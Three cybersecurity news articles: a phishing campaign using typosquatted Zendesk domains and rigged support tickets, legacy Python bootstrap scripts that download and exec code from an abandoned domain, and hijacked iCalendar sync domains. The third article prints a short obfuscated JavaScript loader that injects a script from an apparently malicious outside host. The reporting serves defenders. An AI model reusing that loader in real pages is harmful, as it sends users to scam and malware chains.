A sophisticated, complex new cyber offensive has emerged from the “Scattered Lapsus$ Hunters,” a threat collective that has aggressively shifted toward exploiting supply-chain vulnerabilities.

This latest campaign targets Zendesk, a critical customer support platform, effectively turning a trusted business tool into a launchpad for corporate spying.

The attackers have successfully registered over 40 typosquatted domains, including deceptive examples like znedesk[.]com and vpn-zendesk[.]com.

These sites are meticulously designed to mimic legitimate login environments, hosting fraudulent Single Sign-On (SSO) portals that capture credentials from unsuspecting users.

The campaign’s infrastructure reveals a coordinated effort to bypass standard detection protocols. The domains were consistently registered through NiceNic and use Cloudflare-masked nameservers to hide their true hosting origins.

By using these hiding techniques, the actors ensure their phishing pages remain active long enough to harvest significant volumes of high-privilege credentials before defenders can react.

This demonstrates a clear, strategic evolution in their capabilities, allowing them to maintain operational secrecy while targeting widespread platforms used by global enterprises.

The impact of this targeted approach extends far beyond simple credential theft. Reliaquest security analysts identified the malware and noted that the campaign shares distinct domain registry characteristics with the group’s previous attacks on Salesforce in August 2025.

Once attackers bypass the initial authentication layer, they establish a persistent foothold that facilitates lateral movement across the corporate network.

This access allows them to steal highly sensitive customer data, including billing information and government IDs, mirroring the massive data theft seen in their September 2025 breach of Discord.

Weaponizing Support Tickets

The group’s most dangerous tactic involves the direct weaponization of legitimate support tickets to bypass traditional perimeter defenses.

Instead of relying solely on external phishing emails, they submit fraudulent tickets directly into an organization’s Zendesk portal.

These tickets typically masquerade as urgent system administration requests or password reset inquiries, creating a fabricated sense of urgency that compels support agents to act without verification.

Embedded within these tickets are links to the typosquatted domains or malicious payloads designed to compromise the endpoint.

When a help-desk employee interacts with the ticket, they accidentally trigger the download of Remote Access Trojans (RATs).

This grants the attackers persistent remote control, allowing them to execute commands and monitor activity.

The group has brazenly boasted about these complex operations, specifically warning incident response teams to watch their logs closely as they prepare to collect vital customer databases through the upcoming 2026 holiday season.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Scattered Lapsus$ Hunters Registered 40+ Domains Mimicking Zendesk Environments appeared first on Cyber Security News.

Hidden vulnerabilities in legacy code often create unseen risks for modern development environments.

One such issue recently surfaced within the Python ecosystem, where outdated bootstrap scripts associated with the zc.buildout tool expose users to domain takeover attacks.

These scripts, designed to automate the installation of package dependencies, contain hardcoded references to external domains that are no longer under the control of the original maintainers.

The core of the problem is a specific behavior in these scripts where they attempt to fetch the deprecated distribute package from python-distribute[.]org.

This domain has been abandoned since 2014 and is currently parked and available for purchase. If a threat actor were to acquire this domain, they could serve malicious payloads that would be automatically downloaded and executed by any developer running the compromised bootstrap script.

This creates a direct path for supply chain attacks, bypassing standard security checks.

Reversinglabs security analysts identified this vulnerability, noting that it affects several well-known packages, including slapos.core, pypiserver, and tornado.

Although many developers have transitioned to newer packaging standards, these legacy files often persist in repositories.

The vulnerability is not triggered during a standard pip install but typically requires manual execution or invocation through a build process like a Makefile.

Once activated, the script blindly trusts the external source, creating a significant supply chain risk similar to the fsevents incident in the npm registry.

Analyzing the Execution Mechanism

The technical core of this vulnerability lies in the insecure way the bootstrap script handles dependency resolution. The code logic specifically checks for the presence of the distribution package.

If it is not found, the script initiates a download routine using Python’s built-in urllib libraries. As illustrated in the figure above, the distributed setup is fetched and executed in bootstrap.py; the script explicitly requests content from the now-defunct python-distribute[.]org.

Crucially, the response from this URL is passed directly to an exec() function, which runs the code immediately without any integrity checks or signature verification.

To validate this vector, researchers crafted a proof-of-concept exploit targeting slapos.core. The Proof-of-concept script exploits the vulnerability in slapos.core, the PoC works by manipulating command-line arguments to force the script into its vulnerable download path.

The result of the terminal output after running the PoC script confirms that the script successfully connects to the external domain, proving that any code hosted there would run with the user’s full privileges.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Vulnerable Codes in Legacy Python Packages Enables Attacks on Python Package Index Via Domain Compromise appeared first on Cyber Security News.

Digital calendars have become indispensable tools for managing personal and professional schedules. Users frequently subscribe to external calendars for public holidays, sports schedules, or community events to keep their agendas up to date.

While these subscriptions offer convenience, they create a persistent connection between a user’s device and an external server.

If the domain hosting the calendar is abandoned and subsequently expires, it opens a dangerous vulnerability.

Cybercriminals can re-register these expired domains, effectively hijacking the trust established by the original subscription.

The attack vector is particularly insidious because it requires no new action from the victim. The user’s device continues to perform background synchronization requests to the now-malicious domain.

Attackers can then push diverse threats directly into the calendar interface, ranging from scareware that mimics system security alerts to phishing links disguised as exclusive offers.

This method bypasses traditional email filters, leveraging the implicit trust users place in their personal planning tools to deliver malicious payloads.

Bitsight security analysts identified this emerging threat landscape after investigating a single suspicious domain distributing holiday events.

Their deep dive revealed a sprawling network of over 390 abandoned domains that were actively receiving synchronization requests.

Further analysis indicated that these domains were communicating with approximately 4 million unique IP addresses daily, primarily from iOS and macOS devices.

This massive scale highlights how a simple lapsed domain registration can expose millions of users to potential compromise without their knowledge.

Technical Breakdown of the Synchronization Traffic

The investigation uncovered specific technical patterns that facilitate this exploitation. The traffic is characterized by HTTP requests where the Accept header signals the device’s readiness to parse calendar files.

The User-Agent string, typically containing the daemon identifier, explicitly identifies the source as the iOS Calendar system, confirming the request is a background process rather than a user-initiated browser visit.

GET /[URI]
Host: [Target_Domain]
User-Agent: iOS/17.5.1 (21F90) dataaccessd/1.0
Accept: text/calendar

Researchers categorized the malicious traffic into two main types: Base64-encoded URIs and Webcal query requests.

As seen in the above figure that the Calendar .ics file returned by active domain, the server responds with an iCalendar file that can contain manipulated event data.

Additionally, the underlying infrastructure often employs heavily obfuscated JavaScript to execute deeper compromises.

The code snippet below demonstrates how a payload is dynamically injected into the page’s Document Object Model to initiate a redirection chain:-

_0x407c32.src = "https://render.linetowaystrue.com/jRQxhz";
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(_0x407c32, document.currentScript);
}

This script, once deobfuscated, reveals the mechanism used to load further malicious content, often leading users to the scams.

By understanding these distinct traffic signatures and script behaviors, security professionals can better identify and block this covert attack vector.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Over 390 Abandoned iCalendar Sync Domains Could Expose ~4 Million Devices to Security Risks appeared first on Cyber Security News.